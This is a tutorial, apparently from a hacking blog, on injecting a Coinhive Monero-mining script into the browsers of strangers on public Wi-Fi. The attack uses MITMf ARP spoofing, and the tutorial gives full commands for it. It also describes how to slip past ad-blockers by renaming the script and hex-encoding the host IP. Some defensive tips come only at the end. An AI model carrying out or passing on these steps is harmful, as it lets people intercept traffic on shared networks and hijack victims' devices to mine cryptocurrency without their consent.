This tool was designed as an alternative revenue-generating method for website administrators looking to get rid of ugly banner ads taking up space on their website that could be easily banished using ad-blockers. Instead of Bitcoin (BTC) or other popular cryptocurrencies, Coinhive mines for Monero (XMR) which is valued about 35 times less than Bitcoin at the time of this writing but still in the top 10 most valuable cryptocurrencies available (based on price per coin).
The BlackBerry incident is one of many reported cases where hackers and internet service providers (ISPs) used Coinhive for malicious purposes. In October, TrendMicro discovered several apps found in the Google Play Store which utilized Coinhive's mining technology by invisibly mining cryptocurrencies when the Android apps were installed. There were also reports of Coinhive miners embedded on a Starbuck's website, which was placed there by an ISP.
There are several GitHub projects, such as CoffeeMiner, designed to perform man-in-the-middle (MitM) attacks to inject Coinhive miners into web browsers connected to public Wi-Fi hotspots. However, in my experience with MitM attacks, I believe it would be easier to use a tool like the Man-in-the-Middle Framework (MITMf) to achieve the same results with a single command. MITMf is an excellent tool created to make MitM attacks as simple as possible.
I'll be installing MITMf in Kali Linux using apt-get. Simply type the below command into a terminal. If you'd rather install MITMf from the source code, you can reference Takhion's excellent guide to doing so or the instructions on GitHub.
sudo apt-get install mitmf
That's it for installing MitMF. There's absolutely no configuration required after installing it, so let's dive into creating a Coinhive account next.
Now that we have MitMF installed, head over to the Coinhive registration page to create an account. There are no requirements for creating an account with Coinhive — anyone can signup in seconds.
To find your site key, navigate to the "Sites & API Keys" page. The site key we'll be using is next to Site Key (public), so make sure to copy that down for later.
Anyone using an ad-blocker like uBlock Origin will find the Coinhive page appears broken and malformed. The uBlock Origin ad-blocker, one most popular ad-blockers available, currently blacklists the coinhive.com domain. This is no doubt a result of hackers abusing Coinhive. Disable your ad-blocker to register and use Coinhive.
var miner = new CoinHive.Anonymous('YOUR-SITE-KEY-HERE');
The first script source ("script src") line will instruct victim browsers to download the .js file from the Coinhive website. The "var miner" line will tell Coinhive which account is mining the Monero, and the "miner.start" line instructs victim browsers to start mining immediately. We'll need to focus on obfuscating the coinhive.com domain and the .js filename if we want to evade most ad-blockers.
Just note that using steps 4 and 5 below may not effectively evade all ad-blockers. The way a miner works is that it has to report its proof-of-work back to the server, otherwise, it's just mining for no reason. Since the source code is hard-coded to make calls back to the Coinhive server, ad-blockers that block on the DNS level may still block the proofs from getting to the server, preventing any cryptocurrency from being earned on the account. However, ad-blockers that only block on the HTML tag level will almost certainly still get through.
Let's also rename the file for further evasion. A random string that's unlikely to be found in an ad-blocker database seems like good practice for this sort of attack. We can easily use OpenSSL from a terminal to generate random strings:
openssl rand -hex 16
The 16 tells OpenSSL to generate 16 random characters. If you wish to generate a longer string, simply increase the value to your preference. Next, we can rename the "coinhive.min.js" filename with the mv command:
mv coinhive.min.js random-string-here.js
I wasn't clever about my random string name for this demonstration. Simply typing random letters and numbers on your keyboard will suffice.
python3 -m http.server 80
The http.server is the Python3 HTTP server module we'll be enabling with the -m argument. 80 is the port number the HTTP server will listen on. We can verify our Python3 server is up and working by visiting http://127.0.0.1:80 in our browsers. The 127.0.0.1 is the local address of our computer. This is address is commonly used to host services (like HTTP servers) on our computer.
Your local IP address will most likely be something like 192.168.0.2 or 192.168.1.10. When you've figured that out, enter your IP into a hexadecimal converter website to get its hexadecimal equivalent value.
<script src="http://0x0A989811/ghfldghfsdhglfsdhgfd.js "></script>
var miner = new CoinHive.Anonymous('YOUR-SITE-KEY-HERE');
We'll save it into the coinhive-js directory we created earlier as miner.js. Press Ctrl + X on your keyboard to exit nano, then press Y and Enter to save the file.
To use MitMF, run the below command.
mitmf -i wlan0 --inject --js-file /tmp/coinhive-js/miner.js --arp --spoof --gateway 192.168.0.1
The -i tells MITMf which network interface to attack on, while wlan0 is the default wireless interface in Kali Linux. The 192.168.0.1 gateway address is the local IP address of the Wi-Fi router. 192.168.0.1 is a very common gateway address. To find your router's local IP address, you can try running the route -n command in a terminal. Under the "Gateway" column, you should see something like "192.168.X.X."
You may also notice I installed three of the top ad-blockers from the Chrome Web Store. None of the ad-blockers detected this activity as nefarious or malicious.
- Opera also includes a feature called "NoCoin" that blocks cryptocurrency mining scripts on webpages, so that's an interesting browser option if you're not in love with Chrome, Safari, Edge, etc. However, there are some browser extensions that do something similar.
- Also, just check the address bar of the browser; If you're on an HTTPS site with the lock in the corner, you likely haven't been MitM'd. Many websites get added to the browser HSTS preload list, which means even if a MitM attack tries to strip HSTS headers and redirect to HTTP instead of HTTPS, the browser won't comply as it knows to only contact that domain over HTTPS. So, the Coinhive mining hack above wouldn't work on these sites anyway. You can check if a site is on the HSTS browser preload list by typing in its root domain name into an online tool.
- Another step you can take to protect yourself from MitM attacks on public networks is to use a virtual private network (VPN). While using a VPN won't block a miner script served from the server, it will bypass the MiTM attack on the specific access point.
- If you use an ad-blocker, make sure to use one that works on the DNS level and not just the HTML tag level. While it won't necessarily prevent your computer from becoming a miner, it will prevent them from earning any reward from it.
I made 0.00947 XMR in 60 hours, a whopping $0.89, that's $0.36 a day
Not the most impressive returns, but there's no doubt mining cryptocurrency with Coinhive has become a popular avenue for hackers to easily abuse. It may not be very lucrative when used on small websites, but imagine a Coinhive miner on every Facebook and Google page? It could happen.
If you have any questions or concerns about this article, be sure to leave a comment or contact me on Twitter @tokyoneon_.